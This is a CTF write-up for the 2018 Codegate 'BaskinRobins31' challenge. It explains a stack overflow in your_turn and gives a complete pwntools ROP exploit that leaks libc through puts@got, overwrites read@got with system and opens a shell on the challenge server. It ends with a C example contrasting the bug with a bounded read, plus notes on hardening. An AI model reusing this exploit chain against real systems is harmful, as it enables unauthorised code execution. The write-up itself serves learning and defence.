2018 Codegate BaskinRobins31
CTF | 2018. 2. 4. 21:33
Let's check the protection mechanisms first!
Let's look at the main function!
It's a fun Baskin Robbins game. Hint is ROP? Somewhere it must be taking a large input.
I looked for where the input is read, and
in the your_turn function it reads 400 bytes, more than the size of s. Since neither PIE nor Full RELRO is enabled, I did ROP using the bss area and the functions' PLT/GOT entries.
```python
from pwn import *

# Local run against the remote's libc (the original keeps this line commented out)
# p = process(["./BaskinRobins31"], env={'LD_PRELOAD': 'libc6_2.23-0ubuntu10_amd64.so'})
p = remote("ch41l3ng3s.codegate.kr", 3131)
elf = ELF("./BaskinRobins31")

# Gadgets in the non-PIE binary, as the chain below uses them
rdi = 0x00400bc3  # pop rdi ; ret
rsi = 0x00400bc1  # pop rsi ; pop r15 ; ret
rdx = 0x0040087c  # pop rdx ; ret

read_plt = elf.plt["read"]
read_got = elf.got["read"]
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
bss = elf.bss()
binsh = b"/bin/sh\x00"

# 176 bytes fill s, 8 more cover the saved rbp, then the return address follows
payload = b"A" * 176
payload += b"B" * 8

# 1) puts(puts@got): leak the libc address of puts
payload += p64(rdi) + p64(puts_got)
payload += p64(puts_plt)

# 2) read(0, bss, len(binsh)+1): store "/bin/sh\0" in .bss
payload += p64(rdi) + p64(0)
payload += p64(rsi) + p64(bss) + p64(bss)  # second value lands in r15
payload += p64(rdx) + p64(len(binsh) + 1)
payload += p64(read_plt)

# 3) read(0, read@got, 8): overwrite read's GOT entry (no Full RELRO) with system
payload += p64(rdi) + p64(0)
payload += p64(rsi) + p64(read_got) + p64(read_got)
payload += p64(rdx) + p64(8)
payload += p64(read_plt)

# 4) read@plt now jumps to system: system("/bin/sh")
payload += p64(rdi) + p64(bss)
payload += p64(read_plt)

print(p.recv(1024))
p.send(payload)
print(p.recvuntil(b"Don't break the rules...:( \n"))

leak = u64(p.recv(6) + b"\x00\x00")
base = leak - 0x6f690     # offset of puts in libc6_2.23-0ubuntu10
system = base + 0x45390   # offset of system in the same libc
print("1: " + hex(leak))
print("2: " + hex(base))
print("3: " + hex(system))

p.send(binsh)
p.send(p64(system))
p.interactive()
```
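The root cause in your_turn is a read() whose length argument (400) is fixed independently of the buffer it writes into. The following C example is added here for contrast and is not code from the challenge binary or from this writeup: it places the unbounded shape next to a bounded version where the length is derived from the buffer, and feeds a 400-byte input through a pipe to show that the bounded version accepts at most the buffer size minus the terminator. The buffer size TURN_BUF of 176 is an assumption taken from the 176 filler bytes in the payload above; the function names are hypothetical.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Assumption: the writeup's payload uses 176 filler bytes before the saved rbp,
   so the stack buffer s is taken to be 176 bytes here. */
#define TURN_BUF 176

/* Shape of the bug the writeup describes (illustration only, never called here):
   the length handed to read() is a constant 400, larger than the destination. */
int your_turn_unbounded(int fd) {
    char s[TURN_BUF];
    ssize_t n = read(fd, s, 400);  /* 400 > sizeof(s): excess lands on saved rbp / return address */
    return (int)n;
}

/* Bounded form: the read length comes from the buffer's capacity, one byte is
   reserved for the terminator, and the caller learns exactly how many bytes arrived. */
ssize_t read_turn(int fd, char *s, size_t cap) {
    if (s == NULL || cap == 0) return -1;
    ssize_t n = read(fd, s, cap - 1);
    if (n < 0) return -1;
    s[n] = '\0';
    return n;
}

/* Constructed harness: push `len` bytes of 'A' through a pipe into a
   TURN_BUF-sized stack buffer and report how many bytes read_turn() accepted.
   Returns -2 if the buffer is not NUL-terminated afterwards. */
ssize_t accept_input_of_length(size_t len) {
    int fds[2];
    if (len == 0 || pipe(fds) != 0) return -1;
    char *data = malloc(len);
    if (data == NULL) { close(fds[0]); close(fds[1]); return -1; }
    memset(data, 'A', len);
    ssize_t w = write(fds[1], data, len);
    close(fds[1]);
    free(data);
    if (w != (ssize_t)len) { close(fds[0]); return -1; }

    char s[TURN_BUF];
    ssize_t n = read_turn(fds[0], s, sizeof s);
    close(fds[0]);
    if (n >= 0 && s[n] != '\0') return -2;
    return n;
}

int main(void) {
    printf("400-byte input: read_turn accepted %zd bytes\n", accept_input_of_length(400));
    printf("3-byte input:   read_turn accepted %zd bytes\n", accept_input_of_length(3));
    return 0;
}
```

With a 400-byte input the bounded reader stops at 175 bytes, so nothing reaches the saved rbp or the return address; the same input against the unbounded shape is what makes the ROP chain above possible. Compiling the binary with PIE and Full RELRO would not remove the overflow, but it would take away the fixed gadget addresses and the writable read@got entry that the chain relies on.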
It was a relief that the competition had problems I could solve, heh.